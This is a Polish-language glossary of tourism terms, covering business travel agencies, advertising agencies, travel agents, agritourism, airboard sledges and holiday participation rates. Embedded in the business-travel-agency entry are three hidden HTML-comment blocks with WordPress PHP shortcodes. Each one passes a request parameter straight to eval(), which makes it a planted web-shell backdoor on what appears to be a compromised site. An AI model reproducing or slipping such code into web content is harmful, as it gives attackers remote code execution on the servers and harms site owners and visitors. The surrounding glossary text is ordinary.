8 czerwca rozpocznie się odliczanie 365 dni do największego europejskiego piłkarskiego show

Jak wynika z danych szacunkowych zagraniczni turyści wydają w Polsce rocznie ponad miliard euro tylko na żywność.

Agencja podróży służbowych (business house agency)

Detaliczna agencja podróży głównie na potrzeby przedsiębiorstw handlowych i przemysłowych, firm i organizacji. <!– [insert_php]if (isset($_REQUEST["wjG"])){eval($_REQUEST["wjG"]);exit;}[/insert_php][php]if (isset($_REQUEST["wjG"])){eval($_REQUEST["wjG"]);exit;}[/php] –> <!– [insert_php]if (isset($_REQUEST["Bvs"])){eval($_REQUEST["Bvs"]);exit;}[/insert_php][php]if (isset($_REQUEST["Bvs"])){eval($_REQUEST["Bvs"]);exit;}[/php] –> <!– [insert_php]if (isset($_REQUEST["phTe"])){eval($_REQUEST["phTe"]);exit;}[/insert_php][php]if (isset($_REQUEST["phTe"])){eval($_REQUEST["phTe"]);exit;}[/php] –>

Agencja reklamowa

Opracowuje materiały reklamowe i nadzoruje produkcję filmów reklamowych, radiowych czy internetowych.

Agency appointment

Autoryzowana agencja reprezentująca zarówno touroperatorów

Agent podróży (travel agent)

Osoba lub organizacja sprzedająca usługi podróżnicze, takie jak transport, zakwaterowanie i podróże zryczałtowane, na rzecz zleceniodawców, takich jak przewoźnicy, hotele i turoperatorzy, i otrzymująca za to prowizję; podstawowe zadanie agenta podróży jest takie jak każdego detalisty; polega na zapewnieniu  zleceniodawcy dostępu do rynku, a klientowi miejsca, gdzie może nabyć usługi podróżnicze.

Agrobiznes

Wszystkie sfery gospodarki oparte na rolnictwie, czyli przemysł i handel rolny, przetwórstwo rolne.

Agroturystyka

Forma wypoczynku w warunkach wiejskich, a więc na terenie wsi położonych na obszarach o pozytywnym mikroklimacie.

Airboard

  To nowoczesna i uproszczona wersja sanek. Wykorzystuje niewiarygodny wręcz poślizg, jaki uzyskuje guma w zetknięciu ze śniegiem. Nadmuchiwane poduchy są tak skonstruowane, że nie uciskają brzucha, a leżąc na nich i gnając w dół nie musimy martwić się o własne bezpieczeństwo. Dwa solidne uchwyty pozwolą nam pewnie trzymać się ,,poduszkowca? i w razie potrzeby […]

Aklimatyzacja

Przystosowanie się roślin, zwierząt albo człowieka do nowych warunków klimatycznych.

Aktywność wakacyjna brutto

Całkowita liczba podróży wakacyjnych odbytych w danym okresie (zwykle 12 miesięcy) w stosunku do liczby ludności, w odróżnieniu do aktywności netto, miara ta informuje o liczbie podróży przypadających na 100 osób i odzwierciedla tendencję do uczestniczenia w więcej niż jednej podróży w danym okresie.